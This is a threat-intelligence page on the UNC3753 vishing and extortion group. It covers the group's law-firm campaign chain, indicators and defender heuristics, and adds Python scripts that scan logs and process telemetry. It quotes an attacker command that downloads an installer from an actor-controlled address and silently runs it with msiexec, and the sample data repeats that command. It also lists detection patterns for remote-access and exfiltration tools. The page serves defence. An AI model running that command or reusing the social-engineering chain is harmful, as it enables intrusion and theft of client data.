UNC3753
Summary
UNC3753 is a financially motivated data-theft extortion cluster tracked by Mandiant / Google Threat Intelligence Group. Google says the cluster is also tracked as Luna Moth, Chatty Spider, and Silent Ransom Group.
From January through May 2026, Mandiant observed UNC3753 targeting dozens of U.S. professional-services, legal, and financial-services organizations. The operators use benign email pretexts, follow-on voice phishing, screen sharing, remote-management tools, and victim-assisted data staging to steal sensitive files quickly enough that an intrusion can move from first contact to extortion in a single business day.
Tags
- groups
- actor
- UNC3753
- Luna Moth
- Chatty Spider
- Silent Ransom Group
- vishing
- social engineering
- RMM
- data theft
- extortion
- legal sector
- professional services
- financial services
- United States
Why this matters
- UNC3753 bypasses many perimeter controls by convincing users to run legitimate screen-sharing, remote-desktop, and remote-monitoring tools.
- Mandiant reports recent cases where data search, staging, and theft began in under an hour, leaving little response time after the first vishing success.
- The 2026 campaign targets law-firm and professional-services data such as proprietary agreements, tax records, personally identifiable information, financial records, and client material.
- Mandiant says some possibly linked cases included people posing as IT technicians entering corporate offices to try direct endpoint exfiltration with USB storage, making physical access controls part of the same intrusion surface.
Reported 2026 law-firm campaign chain
- Operators send low-signal invoice-themed email from actor-controlled consumer email accounts. The messages contain no links or attachments and are meant to establish a pretext for later calls.
- Callers impersonate internal IT help desk or security staff, often targeting employees whose contact details are publicly listed.
- Under data-migration, invoice, or security-issue pretexts, the caller directs the employee into screen-sharing or remote-control sessions.
- Screen-sharing and remote access may use Zoom, Microsoft Terminal Services, Microsoft Teams, Quick Assist, AnyDesk, Bomgar, Zoho Assist, or a claimed SuperOps RMM installer.
- The actor may pass installer links and commands through privnote[.]com; Mandiant observed a cURL-to-MSI pattern resembling:
  curl -sL "http://[actor-controlled-ip]/installer" -o "SuperOps.msi" && msiexec /i "SuperOps.msi" /quiet
- In BYOD cases, the actor used the victim's personal endpoint to reach corporate VDI such as Windows 365 or Citrix.
- Operators enumerate local directories, active OneDrive folders, mapped network drives, and legal document repositories.
- In law-firm environments, Mandiant saw searches in iManage for tax logs, Forms W-2 / W-9 / 1099, audit files, corporate client agreements, Social Security numbers, and other sensitive folders.
- Staged data is placed in user-accessible paths such as Downloads or Roaming profile directories.
- Exfiltration uses browser uploads to actor-controlled consumer file-sharing accounts, portable WinSCP, Rclone, Google Drive, FTP/SFTP flows, or victim-sent email forwarding from the target mailbox.
- Extortion emails arrive quickly after theft, sometimes within 30 minutes of the actor leaving the environment, with short deadlines and threats to notify employees, clients, or publish data.
Infrastructure and leak-site notes
- Mandiant reports UNC3753 uses hxxps[:]//business-data-leaks[.]com to disclose victims and stolen data.
- Google Threat Intelligence Group identified suspected social-engineering infrastructure using organization-themed domains such as:
  <organization>-itdesk[.]com
  <organization>-it[.]com
  <organization>-helpdesk[.]com
- Public Google reporting lists example IP indicators including 192.236.147.131, 192.236.147.138, 193.141.60.212, 192.236.154.158, 192.236.146.173, 174.169.162.62, and 64.94.84.97.
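The indicators above are only useful once they are matched against your own telemetry. The following is an added example, not code from the page or from Google/Mandiant: it refangs the published indicators, checks DNS and connection log lines against them, and flags the help-desk-themed lookalike pattern (<organization>-itdesk, -it, -helpdesk) for a hypothetical organization name. The log format, the organization token "examplefirm", and the 10.0.0.x source addresses are constructed for the example; the two-label registrable-domain split assumes a simple TLD such as .com.

```python
import re
from typing import Iterable, List, NamedTuple

# Indicators quoted from the page, kept in their published (defanged) form.
PAGE_IOCS = [
    "hxxps[:]//business-data-leaks[.]com",
    "192.236.147.131", "192.236.147.138", "193.141.60.212", "192.236.154.158",
    "192.236.146.173", "174.169.162.62", "64.94.84.97",
]

# Second-level-label suffixes from the page's <organization>-itdesk / -it / -helpdesk pattern.
# Longest suffix first so "-itdesk" is not mistaken for "-it".
HELPDESK_SUFFIXES = ("-itdesk", "-helpdesk", "-it")

# Hypothetical tokens identifying the defending organization (constructed for the example).
ORG_TOKENS = ["examplefirm"]

# Constructed DNS/connection log lines in a simple key=value layout.
SAMPLE_LOG = [
    "2026-03-04T14:02:11Z src=10.0.0.12 query=login.microsoftonline.com",
    "2026-03-04T14:05:40Z src=10.0.0.12 query=examplefirm-helpdesk.com",
    "2026-03-04T14:05:41Z src=10.0.0.12 dst=192.236.147.138 proto=tcp dport=443",
    "2026-03-04T14:09:03Z src=10.0.0.31 query=examplefirm.com",
    "2026-03-04T14:20:19Z src=10.0.0.31 query=business-data-leaks.com",
    "2026-03-04T14:21:00Z src=10.0.0.31 query=examplefirm-itdesk.com",
]

QUERY = re.compile(r"\bquery=([^\s]+)")
DEST = re.compile(r"\bdst=(\d{1,3}(?:\.\d{1,3}){3})\b")


class Hit(NamedTuple):
    line: str
    rule: str
    value: str


def refang(ioc: str) -> str:
    """Undo common defanging (hxxp, [:], [.]) and strip scheme and trailing slash."""
    s = ioc.replace("hxxps", "https").replace("hxxp", "http")
    s = s.replace("[:]", ":").replace("[.]", ".")
    s = re.sub(r"^https?://", "", s)
    return s.rstrip("/").lower()


def is_helpdesk_lookalike(domain: str, org_tokens: Iterable[str]) -> bool:
    """True when the registrable label is <org-token><suffix>, e.g. examplefirm-itdesk.com.
    Assumes a two-label split (label.tld); a public-suffix list is needed for .co.uk-style TLDs."""
    labels = domain.lower().rstrip(".").split(".")
    if len(labels) < 2:
        return False
    sld = labels[-2]
    for suffix in HELPDESK_SUFFIXES:
        if sld.endswith(suffix):
            prefix = sld[: -len(suffix)]
            return bool(prefix) and any(tok in prefix for tok in org_tokens)
    return False


def scan(lines: Iterable[str], org_tokens: Iterable[str]) -> List[Hit]:
    """Match each line against the refanged indicators and the lookalike pattern."""
    iocs = {refang(i) for i in PAGE_IOCS}
    hits: List[Hit] = []
    for line in lines:
        m = QUERY.search(line)
        if m:
            domain = m.group(1).lower().rstrip(".")
            if domain in iocs:
                hits.append(Hit(line, "known_ioc_domain", domain))
            elif is_helpdesk_lookalike(domain, org_tokens):
                hits.append(Hit(line, "helpdesk_lookalike_domain", domain))
        m = DEST.search(line)
        if m and m.group(1) in iocs:
            hits.append(Hit(line, "known_ioc_ip", m.group(1)))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG, ORG_TOKENS):
        print(f"{hit.rule:28} {hit.value:32} {hit.line}")
```

The lookalike rule is deliberately narrow: it fires only when the second-level label is the organization's own token followed by one of the three suffixes reported on the page, so a legitimate examplefirm.com query is not flagged while examplefirm-helpdesk.com is.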
Defender heuristics
- Treat unexpected invoice/security/data-migration emails followed by help-desk phone calls as a single attack path even when the email has no link or attachment.
- Require employees to verify help-desk calls through an independently known channel before joining screen-sharing sessions or installing RMM tools.
- Alert on new AnyDesk, Bomgar, Zoho Assist, SuperOps, WinSCP, Rclone, Quick Assist, Teams remote-control, or unusual Terminal Services activity from user workstations and BYOD-to-VDI paths.
- Monitor for MSI installers launched from user profile paths or downloaded by command-line tools such as curl during remote-support sessions.
- In legal environments, watch iManage and document-management searches for tax-form, audit, client-agreement, SSN, and mass-export patterns followed by Downloads/Roaming staging.
- Correlate remote session telemetry, VDI access, OneDrive activity, browser uploads, WinSCP/Rclone execution, mailbox forwarding/sending, and file-sharing account destinations.
- Extend security awareness and incident runbooks to physical impersonation: front desks and office staff should verify unscheduled IT technicians, and endpoints should restrict USB mass-storage use where business permits.
- When UNC3753-style extortion arrives, prioritize scoping data access, disabling remote tools, invalidating sessions, reviewing VDI/BYOD paths, preserving document-system logs, and identifying client-data exposure before broad but unfocused resets.
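The endpoint heuristics above (new remote-access or transfer tools on user workstations, MSI installs from profile paths, and curl-driven downloads during support sessions) can be expressed as simple rules over process-creation telemetry. The following is an added example, not code from the page or from Google/Mandiant. The event records, host names, user names, and the 198.51.100.23 download address are constructed for the example; matching tools by executable-name keyword is a stated simplification, and a production rule should also use signer and product-name fields.

```python
import re
from typing import Iterable, List, NamedTuple


class ProcessEvent(NamedTuple):
    host: str
    user: str
    parent: str
    image: str      # full path of the executable
    cmdline: str    # full command line


class Finding(NamedTuple):
    host: str
    user: str
    rule: str
    evidence: str


# Executable-name keywords for the remote-access and transfer tools the page lists.
# Keyword matching on image names is an assumption; signer/product telemetry is stronger.
TOOL_KEYWORDS = ("anydesk", "bomgar", "zohoassist", "superops",
                 "winscp", "rclone", "quickassist")

# msiexec /i <package>, package optionally quoted
MSI_INSTALL = re.compile(r'\bmsiexec(?:\.exe)?\b.*?/i\s+"?([^"\s]+)', re.IGNORECASE)
# curl ... -o <outfile>; the page reports a curl-to-MSI pattern during support sessions
CURL_OUT = re.compile(r'\bcurl(?:\.exe)?\b.*?\s-o\s+"?([^"\s]+)')

PROFILE_VARS = ("%userprofile%", "%appdata%", "%localappdata%", "%temp%")

# Constructed sample telemetry modelled on the chain reported on the page,
# followed by two benign events that the rules should leave alone.
SAMPLE_EVENTS = [
    ProcessEvent("WS-LEGAL-07", "jdoe", "explorer.exe", r"C:\Windows\System32\cmd.exe",
                 r'cmd.exe /c curl -sL "http://198.51.100.23/installer" -o "SuperOps.msi" && msiexec /i "SuperOps.msi" /quiet'),
    ProcessEvent("WS-LEGAL-07", "jdoe", "explorer.exe", r"C:\Windows\System32\msiexec.exe",
                 r'msiexec.exe /i "C:\Users\jdoe\Downloads\SuperOps.msi" /quiet'),
    ProcessEvent("WS-LEGAL-07", "jdoe", "explorer.exe",
                 r"C:\Users\jdoe\AppData\Local\Programs\AnyDesk\AnyDesk.exe",
                 r'"C:\Users\jdoe\AppData\Local\Programs\AnyDesk\AnyDesk.exe"'),
    ProcessEvent("WS-LEGAL-07", "jdoe", "explorer.exe",
                 r"C:\Users\jdoe\Downloads\WinSCP-Portable\WinSCP.exe",
                 r'"C:\Users\jdoe\Downloads\WinSCP-Portable\WinSCP.exe"'),
    ProcessEvent("WS-BENIGN-02", "asmith", "explorer.exe",
                 r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"'),
    ProcessEvent("WS-BENIGN-02", "SYSTEM", "ccmexec.exe", r"C:\Windows\System32\msiexec.exe",
                 r'msiexec.exe /i "C:\Windows\ccmcache\a1\Setup.msi" /qn'),
]


def is_profile_or_relative(path: str) -> bool:
    """True for packages under \\Users\\, under profile environment variables, or given as a
    bare/relative name (resolved in the session's working directory, usually the profile)."""
    low = path.lower()
    if "\\users\\" in low or low.startswith(PROFILE_VARS):
        return True
    return not re.match(r'^(?:[a-zA-Z]:\\|\\\\)', path)


def evaluate(events: Iterable[ProcessEvent]) -> List[Finding]:
    """Apply the three heuristics to each event and collect findings."""
    findings: List[Finding] = []
    for ev in events:
        base = ev.image.rsplit("\\", 1)[-1].lower()
        if any(k in base for k in TOOL_KEYWORDS):
            findings.append(Finding(ev.host, ev.user, "remote_or_transfer_tool", base))
        m = MSI_INSTALL.search(ev.cmdline)
        if m and is_profile_or_relative(m.group(1)):
            findings.append(Finding(ev.host, ev.user, "msi_from_user_path", m.group(1)))
        m = CURL_OUT.search(ev.cmdline)
        if m:
            findings.append(Finding(ev.host, ev.user, "cli_download", m.group(1)))
    return findings


if __name__ == "__main__":
    for f in evaluate(SAMPLE_EVENTS):
        print(f"{f.host:12} {f.user:8} {f.rule:24} {f.evidence}")
```

The managed-installer event from C:\Windows\ccmcache is not flagged because the package sits on an absolute system path, while the relative "SuperOps.msi" and the Downloads-path install both are; correlating these findings with the remote-session, VDI, and upload telemetry listed above is what turns a single hit into the one-day intrusion picture the page describes.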
Related pages
- BlackFile / UNC6671 vishing extortion operation
- Kali365 device-code phishing expansion
- 0ktapus phishing campaign
Sources
- Google Cloud / Mandiant — Seeking Counsel: Ongoing Targeted Campaign Against US Law Firms: https://cloud.google.com/blog/topics/threat-intelligence/targeted-campaign-us-law-firms